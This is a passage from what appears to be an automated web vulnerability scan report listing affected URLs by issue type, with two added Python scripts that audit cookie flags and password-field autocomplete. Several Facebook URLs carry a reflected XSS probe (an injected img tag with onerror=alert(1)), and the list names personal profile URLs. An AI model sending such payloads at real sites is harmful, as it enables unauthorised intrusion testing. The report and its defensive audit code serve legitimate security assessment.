17.298. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

17.299. http://www.facebook.com/

17.300. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

17.301. http://www.facebook.com/10000082482078341583

17.302. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

17.303. http://www.facebook.com/1242845259

17.304. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

17.305. http://www.facebook.com/2008/fbml

17.306. http://www.facebook.com/HockeyKen

17.307. http://www.facebook.com/KickIceForever

17.308. http://www.facebook.com/Loizza

17.309. http://www.facebook.com/burkerkink

17.310. http://www.facebook.com/careers/

17.311. http://www.facebook.com/deedee.perez1

17.312. http://www.facebook.com/directory/pages/

17.313. http://www.facebook.com/directory/people/

17.314. http://www.facebook.com/fayse

17.315. http://www.facebook.com/find-friends

17.316. http://www.facebook.com/gale.l.schenk

17.317. http://www.facebook.com/help/

17.318. http://www.facebook.com/izaOllie

17.319. http://www.facebook.com/jezzas

17.320. http://www.facebook.com/kimberly.christ

17.321. http://www.facebook.com/ladonna.lokey

17.322. http://www.facebook.com/lakendra.roberts

17.323. http://www.facebook.com/login.php

17.324. http://www.facebook.com/matthew.oliveira2

17.325. http://www.facebook.com/mobile/

17.326. http://www.facebook.com/pages/create.php

17.327. http://www.facebook.com/patroyo

17.328. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

17.329. http://www.facebook.com/people/Bucky-Jordan/100000824820783

17.330. http://www.facebook.com/privacy/explanation.php

17.331. http://www.facebook.com/robynalys

17.332. http://www.facebook.com/share.php

17.333. http://www.facebook.com/sharer.php

17.334. http://www.facebook.com/skdarealist

17.335. http://www.facebook.com/stefanoboscolomarchi

17.336. http://www.facebook.com/theteebers

17.337. http://www.facebook.com/wmoppert

17.338. https://www.facebook.com/

17.339. https://www.facebook.com/h02332

17.340. https://www.facebook.com/h02332

17.341. https://www.facebook.com/help/contact.php

17.342. https://www.facebook.com/login.php

17.343. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

17.344. https://www.facebook.com/pages/create.php

17.345. https://www.facebook.com/recover.php

17.346. https://www.godaddy.com/

17.347. https://www.godaddy.com/domains/search.aspx

17.348. http://www.google.com/finance

17.349. http://www.huffingtonpost.com/include/geopromo.php

17.350. http://www.huffingtonpost.com/users/logout/

17.351. http://www.mapquest.com/directions

17.352. http://www.mapquest.com/maps

17.353. http://www.mapquest.com/routeplanner

17.354. http://www.marketwatch.com/News/Story/Story.aspx

17.355. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

17.356. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

17.357. http://www.moviefone.com/

17.358. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.359. http://www.pageflakes.com/subscribe.aspx

17.360. http://www.popeater.com/

17.361. http://www.tuaw.com/hub/app-reviews
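The entries above name the URL of each "Cookie without HttpOnly flag set" instance but not the Set-Cookie header that triggered it. The following is an added example, not code from the XSS.CX report or from the scanner that produced it: it re-does the check offline on a raw HTTP response, parsing every Set-Cookie header and flagging those without HttpOnly, then narrows the list to cookies whose names suggest a session or auth token, which is the subset worth triaging. The sample response, the cookie names and the SESSION_HINTS heuristic are constructed for this example and are not taken from any host in the list.

```python
# Added example for the XSS.CX report, not code from the report or from Burp.
# Re-checks a "Cookie without HttpOnly flag set" finding by parsing Set-Cookie
# headers from a raw HTTP response, the same thing the scanner does.
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class CookieFinding:
    name: str
    httponly: bool
    secure: bool
    samesite: Optional[str]
    session_like: bool  # heuristic, see SESSION_HINTS


# Heuristic only: cookie names that usually carry a session or auth token.
SESSION_HINTS = ("sess", "auth", "token", "login", "sid")

# Constructed response, modelled on what a login endpoint such as 17.11
# (https://api.screenname.aol.com/auth/login) might return. Cookie names and
# values are invented for this example, not captured from that host.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: JSESSIONID=1a2b3c4d5e6f; Path=/; HttpOnly\r\n"
    "Set-Cookie: authToken=deadbeefcafe; Path=/; Secure\r\n"
    "Set-Cookie: __utma=12345.678; Path=/; Expires=Wed, 01 Jan 2031 00:00:00 GMT\r\n"
    "Set-Cookie: lang=en; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_set_cookie(header_value: str) -> CookieFinding:
    """Split one Set-Cookie value into its cookie-pair and attributes (attribute names are case-insensitive)."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, value = attr.partition("=")
        attrs[key.strip().lower()] = value.strip() or None
    return CookieFinding(
        name=name,
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        samesite=attrs.get("samesite"),
        session_like=any(h in name.lower() for h in SESSION_HINTS),
    )


def audit_response(raw: str) -> List[CookieFinding]:
    """One finding per Set-Cookie header; the response body is ignored."""
    head, _, _body = raw.partition("\r\n\r\n")
    findings = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        key, _, value = line.partition(":")
        if key.strip().lower() == "set-cookie":
            findings.append(parse_set_cookie(value.strip()))
    return findings


def missing_httponly(raw: str) -> List[str]:
    """Every cookie set without HttpOnly: this is what the scanner reports."""
    return [f.name for f in audit_response(raw) if not f.httponly]


def missing_httponly_session(raw: str) -> List[str]:
    """The subset to triage first: likely session/auth cookies set without HttpOnly."""
    return [f.name for f in audit_response(raw) if not f.httponly and f.session_like]


if __name__ == "__main__":
    print("all cookies without HttpOnly:", missing_httponly(SAMPLE_RESPONSE))
    print("session-like cookies without HttpOnly:", missing_httponly_session(SAMPLE_RESPONSE))
```

Two triage notes. Most hosts in this section are third-party ad and analytics endpoints (advertising.com, 2o7.net, doubleclick.net, scorecardresearch.com and similar) whose cookies identify a browser for tracking, not a logged-in user; a missing HttpOnly there is noise. The instances on authentication and billing endpoints such as api.screenname.aol.com, my.screenname.aol.com and bill.aol.com are the ones to confirm against the actual Set-Cookie header. And HttpOnly only stops script from reading document.cookie; a script injected through any of the XSS findings elsewhere in this report can still issue requests that carry the cookie, so it limits session theft, not session abuse.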

18. Password field with autocomplete enabled

18.1. http://api.twitter.com/

18.2. http://api.twitter.com/

18.3. http://api.twitter.com/

18.4. http://appworld.blackberry.com/webstore/content/13833

18.5. http://appworld.blackberry.com/webstore/content/13833

18.6. http://appworld.blackberry.com/webstore/content/13833

18.7. http://appworld.blackberry.com/webstore/content/19143

18.8. http://appworld.blackberry.com/webstore/content/19143

18.9. http://appworld.blackberry.com/webstore/content/19143

18.10. http://ar-ar.facebook.com/login.php

18.11. http://digg.com/submit

18.12. https://my.screenname.aol.com/_cqr/login/login.psp

18.13. https://new.aol.com/productsweb

18.14. https://new.aol.com/productsweb/

18.15. https://new.aol.com/productsweb/

18.16. http://o.aolcdn.com/art/merge/

18.17. http://o.aolcdn.com/art/merge/

18.18. http://o.aolcdn.com/art/merge/

18.19. http://o.aolcdn.com/art/merge/

18.20. http://o.aolcdn.com/art/merge/

18.21. http://o.aolcdn.com/art/merge/

18.22. http://o.aolcdn.com/art/merge/

18.23. http://o.aolcdn.com/art/merge/

18.24. http://o.aolcdn.com/art/merge/

18.25. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

18.26. http://shortcuts.com/

18.27. http://top-sec.net/vb/

18.28. http://top-sec.net/vb/calendar.php

18.29. http://top-sec.net/vb/faq.php

18.30. http://top-sec.net/vb/forumdisplay.php

18.31. http://top-sec.net/vb/index.php

18.32. http://top-sec.net/vb/login.php

18.33. http://top-sec.net/vb/member.php

18.34. http://top-sec.net/vb/memberlist.php

18.35. http://top-sec.net/vb/online.php

18.36. http://top-sec.net/vb/online.php

18.37. http://top-sec.net/vb/profile.php

18.38. http://top-sec.net/vb/profile.php

18.39. http://top-sec.net/vb/search.php

18.40. http://top-sec.net/vb/sendmessage.php

18.41. http://top-sec.net/vb/showgroups.php

18.42. http://top-sec.net/vb/showthread.php

18.43. http://top-sec.net/vb/tags.php

18.44. http://twitter.com/

18.45. http://twitter.com/

18.46. http://twitter.com/

18.47. http://twitter.com/search

18.48. https://twitter.com/signup

18.49. https://twitter.com/signup

18.50. http://www.facebook.com/

18.51. http://www.facebook.com/

18.52. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

18.53. http://www.facebook.com/10000082482078341583

18.54. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

18.55. http://www.facebook.com/1242845259

18.56. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

18.57. http://www.facebook.com/2008/fbml

18.58. http://www.facebook.com/AOLrealestate

18.59. http://www.facebook.com/BPAmerica

18.60. http://www.facebook.com/DailyFinance

18.61. http://www.facebook.com/HockeyKen

18.62. http://www.facebook.com/KickIceForever

18.63. http://www.facebook.com/LadyBonesie

18.64. http://www.facebook.com/Loizza

18.65. http://www.facebook.com/aim

18.66. http://www.facebook.com/ajax/intl/language_dialog.php

18.67. http://www.facebook.com/aol

18.68. http://www.facebook.com/aolradio

18.69. http://www.facebook.com/burkerkink

18.70. http://www.facebook.com/careers/

18.71. http://www.facebook.com/deedee.perez1

18.72. http://www.facebook.com/directory/pages/

18.73. http://www.facebook.com/directory/people/

18.74. http://www.facebook.com/facebook

18.75. http://www.facebook.com/fayse

18.76. http://www.facebook.com/find-friends

18.77. http://www.facebook.com/gale.l.schenk

18.78. http://www.facebook.com/help/

18.79. http://www.facebook.com/izaOllie

18.80. http://www.facebook.com/jezzas

18.81. http://www.facebook.com/kimberly.christ

18.82. http://www.facebook.com/ladonna.lokey

18.83. http://www.facebook.com/lakendra.roberts

18.84. http://www.facebook.com/login.php

18.85. http://www.facebook.com/matthew.oliveira2

18.86. http://www.facebook.com/mmafighting

18.87. http://www.facebook.com/mobile/

18.88. http://www.facebook.com/pages/Barnesville/115038011847083

18.89. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

18.90. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

18.91. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

18.92. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

18.93. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

18.94. http://www.facebook.com/pages/HMFIC/149403761740008

18.95. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

18.96. http://www.facebook.com/pages/Merchandiser/123981654314779

18.97. http://www.facebook.com/pages/New-Haven-College/130105783687523

18.98. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

18.99. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

18.100. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

18.101. http://www.facebook.com/pages/Sporting-News/104068362964496

18.102. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

18.103. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

18.104. http://www.facebook.com/pages/create.php

18.105. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

18.106. http://www.facebook.com/patroyo

18.107. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

18.108. http://www.facebook.com/people/Bucky-Jordan/100000824820783

18.109. http://www.facebook.com/plugins/facepile.php

18.110. http://www.facebook.com/plugins/likebox.php

18.111. http://www.facebook.com/policy.php

18.112. http://www.facebook.com/privacy/explanation.php

18.113. http://www.facebook.com/r.php

18.114. http://www.facebook.com/r.php

18.115. http://www.facebook.com/r.php

18.116. http://www.facebook.com/r.php

18.117. http://www.facebook.com/robynalys

18.118. http://www.facebook.com/share.php

18.119. http://www.facebook.com/sharer.php

18.120. http://www.facebook.com/skdarealist

18.121. http://www.facebook.com/sportingnews

18.122. http://www.facebook.com/stefanoboscolomarchi

18.123. http://www.facebook.com/techcrunch

18.124. http://www.facebook.com/terms.php

18.125. http://www.facebook.com/theteebers

18.126. http://www.facebook.com/wmoppert

18.127. https://www.facebook.com/

18.128. https://www.facebook.com/

18.129. https://www.facebook.com/ajax/intl/language_dialog.php

18.130. https://www.facebook.com/h02332

18.131. https://www.facebook.com/help/contact.php

18.132. https://www.facebook.com/login.php

18.133. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

18.134. https://www.facebook.com/pages/create.php

18.135. https://www.facebook.com/r.php

18.136. https://www.facebook.com/r.php

18.137. https://www.facebook.com/r.php

18.138. https://www.facebook.com/recover.php

18.139. https://www.godaddy.com/

18.140. https://www.godaddy.com/domains/search.aspx

18.141. https://www.godaddy.com/gdshop/hosting/landing.asp

18.142. http://www.marketwatch.com/News/Story/Story.aspx

18.143. http://www.marketwatch.com/News/Story/Story.aspx

18.144. http://www.marketwatch.com/News/Story/Story.aspx

18.145. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

18.146. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

18.147. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
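The "Password field with autocomplete enabled" entries above are raised whenever a page contains an input of type password whose effective autocomplete setting is not "off". The following is an added example, not code from the XSS.CX report: it reproduces that check with the standard library HTML parser, taking a form-level autocomplete attribute into account the way browsers do (a field's own attribute overrides the form's). The login page fragment, its form ids and field names are constructed for the example; the real forms on the hosts listed are not reproduced here.

```python
# Added example for the XSS.CX report, not code from the report or from Burp.
# Finds password inputs whose effective autocomplete setting is not "off",
# which is the condition behind the "Password field with autocomplete enabled" entries.
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Constructed login page, standing in for a form like the one at 18.12
# (https://my.screenname.aol.com/_cqr/login/login.psp). Ids and names are invented.
SAMPLE_LOGIN_PAGE = """
<html><body>
<form id="login" method="post" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<form id="register" method="post" action="/register" autocomplete="off">
  <input type="password" name="new_password">
</form>
<form id="change" method="post" action="/change">
  <input type="password" name="old_password" autocomplete="off">
  <input type="password" name="new_password2" autocomplete="new-password">
</form>
</body></html>
"""


class PasswordFieldAuditor(HTMLParser):
    """Record every password input with the autocomplete value that applies to it."""

    def __init__(self) -> None:
        super().__init__()
        self.form_id: Optional[str] = None
        self.form_autocomplete: Optional[str] = None
        # (form id, field name, effective autocomplete value)
        self.findings: List[Tuple[Optional[str], str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases attribute names for us
        if tag == "form":
            self.form_id = a.get("id")
            self.form_autocomplete = (a.get("autocomplete") or "").lower() or None
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            own = (a.get("autocomplete") or "").lower()
            # The field's own attribute wins; otherwise inherit the form's; default is "on".
            effective = own or self.form_autocomplete or "on"
            self.findings.append((self.form_id, a.get("name", ""), effective))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_id = None
            self.form_autocomplete = None


def password_fields_with_autocomplete(html: str) -> List[Tuple[Optional[str], str]]:
    """(form id, field name) for each password field whose effective autocomplete is not 'off'."""
    auditor = PasswordFieldAuditor()
    auditor.feed(html)
    return [(form, name) for form, name, effective in auditor.findings if effective != "off"]


if __name__ == "__main__":
    for form, name in password_fields_with_autocomplete(SAMPLE_LOGIN_PAGE):
        print(f"form={form!r} field={name!r}: autocomplete not disabled")
```

In the sample, the login form's password field and the change form's new_password2 field are reported; new_password is covered by its form's autocomplete="off" and old_password by its own. Note that new_password2 is flagged because its value is "new-password" rather than "off", matching the scanner's rule; that value is in fact the modern recommendation for registration and change-password forms, since it tells the browser not to fill a saved credential. Also treat the whole category as informational today: current browsers ignore autocomplete="off" on login password fields and offer their password manager regardless, so the original concern (a saved password on a shared machine) is no longer something the page author controls.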

19. Source code disclosure

19.1. http://dy.snimg.com/compressed/feed-997a39b72e1a67bbf195043dabbac55e.js

19.2. https://my.screenname.aol.com/_cqr/login/login.psp

19.3. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.ttf

19.4. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.woff

19.5. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.eot

19.6. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.ttf

19.7. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.eot

19.8. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.ttf

19.9. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.woff

19.10. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.ttf

19.11. http://search.twitter.com/javascripts/search/calendar_date_select/calendar_date_select.js

19.12. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

20. ASP.NET debugging enabled

20.1. http://download.chrome.conduit-services.com/Default.aspx

20.2. http://usage.apps.conduit-services.com/Default.aspx

20.3. http://www.eyewonderlabs.com/Default.aspx

20.4. http://www.pageflakes.com/Default.aspx

21. Referer-dependent response

21.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

21.2. http://480-adver-view.c3metrics.com/v.js

21.3. http://api.screenname.aol.com/auth/getToken

21.4. http://api.twitter.com/1/statuses/show.json

21.5. http://api.twitter.com/1/statuses/user_timeline.json

21.6. http://fonts.citysbest.com/k/uni0vle-e.css

21.7. http://view.c3metrics.com/c3VTabstrct-6-2.php

21.8. http://view.c3metrics.com/v.js

21.9. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

21.10. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

21.11. http://www.facebook.com/login.php

21.12. http://www.facebook.com/plugins/activity.php

21.13. http://www.facebook.com/plugins/like.php

21.14. http://www.facebook.com/plugins/likebox.php

21.15. http://www.facebook.com/plugins/recommendations.php

21.16. http://www.facebook.com/policy.php

21.17. https://www.facebook.com/

21.18. https://www.facebook.com/h02332

21.19. https://www.facebook.com/help/contact.php

21.20. http://www.huffingtonpost.com/

21.21. http://www.tuaw.com/hub/app-reviews

22. Cross-domain POST

22.1. http://appworld.blackberry.com/webstore/content/13833

22.2. http://appworld.blackberry.com/webstore/content/19143

22.3. http://www.dailyfinance.com/

22.4. http://www.dailyfinance.com/markets/mostactives

22.5. http://www.lakewoodbeacon.org/

23. Cross-domain Referer leakage

23.1. http://a12.alphagodaddy.com/

23.2. https://account.login.aol.com/_cqr/opr/opr.psp

23.3. http://ad.doubleclick.net/adj/N2724.280341.AOL/B5372265.5

23.4. http://ad.doubleclick.net/adj/N3382.aol.comOX2222V1/B5068759.17

23.5. http://ad.doubleclick.net/adj/N3676.AOL/B5170306.41

23.6. http://ad.doubleclick.net/adj/N815.techcrunch/B5343357

23.7. http://ad.doubleclick.net/adj/huffpost.premium/front

23.8. http://ad.doubleclick.net/adj/spn.fanhouse/greg_couch

23.9. http://ad.doubleclick.net/adj/spn.home/home

23.10. http://ad.doubleclick.net/adj/spn.home/home

23.11. http://ad.doubleclick.net/adj/spn.home/home

23.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

23.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

23.14. http://addons.aol.com/welcome/index.html

23.15. http://ads.pointroll.com/PortalServe/

23.16. http://ads.pointroll.com/PortalServe/

23.17. http://ads.pointroll.com/PortalServe/

23.18. http://ads.pointroll.com/PortalServe/

23.19. http://ads.pointroll.com/PortalServe/

23.20. http://ads.pointroll.com/PortalServe/

23.21. http://ads.pointroll.com/PortalServe/

23.22. http://ads.pointroll.com/PortalServe/

23.23. http://ads.pointroll.com/PortalServe/

23.24. http://ads.pointroll.com/PortalServe/

23.25. http://ads.pointroll.com/PortalServe/

23.26. http://ads.pointroll.com/PortalServe/

23.27. http://ads.pointroll.com/PortalServe/

23.28. http://ads.pointroll.com/PortalServe/

23.29. http://ads.pointroll.com/PortalServe/

23.30. http://ads.pointroll.com/PortalServe/

23.31. http://ads.pointroll.com/PortalServe/

23.32. http://ads.pointroll.com/PortalServe/

23.33. http://ads.pointroll.com/PortalServe/

23.34. http://ads.pointroll.com/PortalServe/

23.35. http://ads.pointroll.com/PortalServe/

23.36. http://ads.pointroll.com/PortalServe/

23.37. http://ads.pointroll.com/PortalServe/

23.38. http://ads.pointroll.com/PortalServe/

23.39. http://ads.pointroll.com/PortalServe/

23.40. http://ads.pointroll.com/PortalServe/

23.41. http://ads.pointroll.com/PortalServe/

23.42. http://ads.pointroll.com/PortalServe/

23.43. http://ads.pointroll.com/PortalServe/

23.44. http://ads.pointroll.com/PortalServe/

23.45. http://ads.pointroll.com/PortalServe/

23.46. http://ads.pointroll.com/PortalServe/

23.47. http://ads.pointroll.com/PortalServe/

23.48. http://ads.pointroll.com/PortalServe/

23.49. http://ads.pointroll.com/PortalServe/

23.50. http://ads.pointroll.com/PortalServe/

23.51. http://ads.pointroll.com/PortalServe/

23.52. http://ads.pointroll.com/PortalServe/

23.53. http://ads.pointroll.com/PortalServe/

23.54. http://ads.pointroll.com/PortalServe/

23.55. http://ads.pointroll.com/PortalServe/

23.56. http://ads.pointroll.com/PortalServe/

23.57. http://ads.pointroll.com/PortalServe/

23.58. http://ads.pointroll.com/PortalServe/

23.59. http://ads.pointroll.com/PortalServe/

23.60. http://ads.pointroll.com/PortalServe/

23.61. http://ads.pointroll.com/PortalServe/

23.62. http://ads.pointroll.com/PortalServe/

23.63. http://ads.pointroll.com/PortalServe/

23.64. http://ads.pointroll.com/PortalServe/

23.65. http://ads.pointroll.com/PortalServe/

23.66. http://ads.pointroll.com/PortalServe/

23.67. http://ads.pointroll.com/PortalServe/

23.68. http://ads.pointroll.com/PortalServe/

23.69. http://ads.pointroll.com/PortalServe/

23.70. http://ads.pointroll.com/PortalServe/

23.71. http://ads.pointroll.com/PortalServe/

23.72. http://ads.pointroll.com/PortalServe/

23.73. http://ads.pointroll.com/PortalServe/

23.74. http://ads.pointroll.com/PortalServe/

23.75. http://ads.pointroll.com/PortalServe/

23.76. http://ads.pointroll.com/PortalServe/

23.77. http://ads.pointroll.com/PortalServe/

23.78. http://ads.pointroll.com/PortalServe/

23.79. http://ads.pointroll.com/PortalServe/

23.80. http://ads.pointroll.com/PortalServe/

23.81. http://ads.pointroll.com/PortalServe/

23.82. http://ads.pointroll.com/PortalServe/

23.83. http://ads.pointroll.com/PortalServe/

23.84. http://ads.pointroll.com/PortalServe/

23.85. http://ads.pointroll.com/PortalServe/

23.86. http://ads.pointroll.com/PortalServe/

23.87. http://ads.pointroll.com/PortalServe/

23.88. http://ads.pointroll.com/PortalServe/

23.89. http://ads.pointroll.com/PortalServe/

23.90. http://ads.pointroll.com/PortalServe/

23.91. http://ads.pointroll.com/PortalServe/

23.92. http://ads.pointroll.com/PortalServe/

23.93. http://ads.pointroll.com/PortalServe/

23.94. http://ads.pointroll.com/PortalServe/

23.95. http://ads.pointroll.com/PortalServe/

23.96. http://ads.pointroll.com/PortalServe/

23.97. http://ads.pointroll.com/PortalServe/

23.98. http://ads.pointroll.com/PortalServe/

23.99. http://ads.pointroll.com/PortalServe/

23.100. http://ads.pointroll.com/PortalServe/

23.101. http://ads.pointroll.com/PortalServe/

23.102. http://ads.pointroll.com/PortalServe/

23.103. http://ads.pointroll.com/PortalServe/

23.104. http://ads.pointroll.com/PortalServe/

23.105. http://ads.pointroll.com/PortalServe/

23.106. http://ads.pointroll.com/PortalServe/

23.107. http://ads.pointroll.com/PortalServe/

23.108. http://ads.pointroll.com/PortalServe/

23.109. http://ads.pointroll.com/PortalServe/

23.110. http://ads.pointroll.com/PortalServe/

23.111. http://ads.pointroll.com/PortalServe/

23.112. http://ads.pointroll.com/PortalServe/

23.113. http://ads.pointroll.com/PortalServe/

23.114. http://ads.pointroll.com/PortalServe/

23.115. http://ads.pointroll.com/PortalServe/

23.116. http://ads.pointroll.com/PortalServe/

23.117. http://ads.pointroll.com/PortalServe/

23.118. http://ads.pointroll.com/PortalServe/

23.119. http://ads.pointroll.com/PortalServe/

23.120. http://ads.pointroll.com/PortalServe/

23.121. http://ads.pointroll.com/PortalServe/

23.122. http://ads.pointroll.com/PortalServe/

23.123. http://ads.pointroll.com/PortalServe/

23.124. http://ads.pointroll.com/PortalServe/

23.125. http://ads.pointroll.com/PortalServe/

23.126. http://ads.pointroll.com/PortalServe/

23.127. http://ads.pointroll.com/PortalServe/

23.128. http://ads.pointroll.com/PortalServe/

23.129. http://ads.pointroll.com/PortalServe/

23.130. http://ads.pointroll.com/PortalServe/

23.131. http://ads.pointroll.com/PortalServe/

23.132. http://ads.pointroll.com/PortalServe/

23.133. http://ads.pointroll.com/PortalServe/

23.134. http://ads.pointroll.com/PortalServe/

23.135. http://ads.pointroll.com/PortalServe/

23.136. http://ads.pointroll.com/PortalServe/

23.137. http://ads.pointroll.com/PortalServe/

23.138. http://ads.pointroll.com/PortalServe/

23.139. http://ads.pointroll.com/PortalServe/

23.140. http://ads.pointroll.com/PortalServe/

23.141. http://ads.pointroll.com/PortalServe/

23.142. http://ads.pointroll.com/PortalServe/

23.143. http://ads.pointroll.com/PortalServe/

23.144. http://ads.pointroll.com/PortalServe/

23.145. http://ads.pointroll.com/PortalServe/

23.146. http://ads.pointroll.com/PortalServe/

23.147. http://ads.pointroll.com/PortalServe/

23.148. http://ads.pointroll.com/PortalServe/

23.149. http://ads.pointroll.com/PortalServe/

23.150. http://ads.pointroll.com/PortalServe/

23.151. http://ads.pointroll.com/PortalServe/

23.152. http://ads.pointroll.com/PortalServe/

23.153. http://ads.pointroll.com/PortalServe/

23.154. http://ads.pointroll.com/PortalServe/

23.155. http://ads.pointroll.com/PortalServe/

23.156. http://ads.pointroll.com/PortalServe/

23.157. http://ads.pointroll.com/PortalServe/

23.158. http://ads.pointroll.com/PortalServe/

23.159. http://ads.pointroll.com/PortalServe/

23.160. http://ads.pointroll.com/PortalServe/

23.161. http://ads.pointroll.com/PortalServe/

23.162. http://ads.pointroll.com/PortalServe/

23.163. http://ads.pointroll.com/PortalServe/

23.164. http://ads.pointroll.com/PortalServe/

23.165. http://ads.pointroll.com/PortalServe/

23.166. http://ads.pointroll.com/PortalServe/

23.167. http://ads.pointroll.com/PortalServe/

23.168. http://ads.pointroll.com/PortalServe/

23.169. http://ads.pointroll.com/PortalServe/

23.170. http://ads.pointroll.com/PortalServe/

23.171. http://ads.pointroll.com/PortalServe/

23.172. http://ads.pointroll.com/PortalServe/

23.173. http://ads.pointroll.com/PortalServe/

23.174. http://ads.pointroll.com/PortalServe/

23.175. http://ads.pointroll.com/PortalServe/

23.176. http://ads.pointroll.com/PortalServe/

23.177. http://ads.pointroll.com/PortalServe/

23.178. http://ads.pointroll.com/PortalServe/

23.179. http://ads.pointroll.com/PortalServe/

23.180. http://ads.pointroll.com/PortalServe/

23.181. http://ads.pointroll.com/PortalServe/

23.182. http://ads.pointroll.com/PortalServe/

23.183. http://ads.pointroll.com/PortalServe/

23.184. http://ads.pointroll.com/PortalServe/

23.185. http://ads.pointroll.com/PortalServe/

23.186. http://ads.pointroll.com/PortalServe/

23.187. http://ads.pointroll.com/PortalServe/

23.188. http://ads.pointroll.com/PortalServe/

23.189. http://ads.pointroll.com/PortalServe/

23.190. http://ads.pointroll.com/PortalServe/

23.191. http://ads.pointroll.com/PortalServe/

23.192. http://ads.pointroll.com/PortalServe/

23.193. http://ads.pointroll.com/PortalServe/

23.194. http://ads.pointroll.com/PortalServe/

23.195. http://ads.pointroll.com/PortalServe/

23.196. http://ads.pointroll.com/PortalServe/

23.197. http://ads.pointroll.com/PortalServe/

23.198. http://ads.pointroll.com/PortalServe/

23.199. http://ads.pointroll.com/PortalServe/

23.200. http://ads.pointroll.com/PortalServe/

23.201. http://ads.pointroll.com/PortalServe/

23.202. http://ads.pointroll.com/PortalServe/

23.203. http://ads.pointroll.com/PortalServe/

23.204. http://ads.pointroll.com/PortalServe/

23.205. http://ads.pointroll.com/PortalServe/

23.206. http://ads.pointroll.com/PortalServe/

23.207. http://ads.pointroll.com/PortalServe/

23.208. http://ads.pointroll.com/PortalServe/

23.209. http://ads.pointroll.com/PortalServe/

23.210. http://ads.pointroll.com/PortalServe/

23.211. http://ads.pointroll.com/PortalServe/

23.212. http://ads.pointroll.com/PortalServe/

23.213. http://ads.pointroll.com/PortalServe/

23.214. http://ads.pointroll.com/PortalServe/

23.215. http://ads.pointroll.com/PortalServe/

23.216. http://ads.pointroll.com/PortalServe/

23.217. http://ads.pointroll.com/PortalServe/

23.218. http://ads.pointroll.com/PortalServe/

23.219. http://ads.pointroll.com/PortalServe/

23.220. http://ads.pointroll.com/PortalServe/

23.221. http://ads.pointroll.com/PortalServe/

23.222. http://ads.pointroll.com/PortalServe/

23.223. http://ads.pointroll.com/PortalServe/

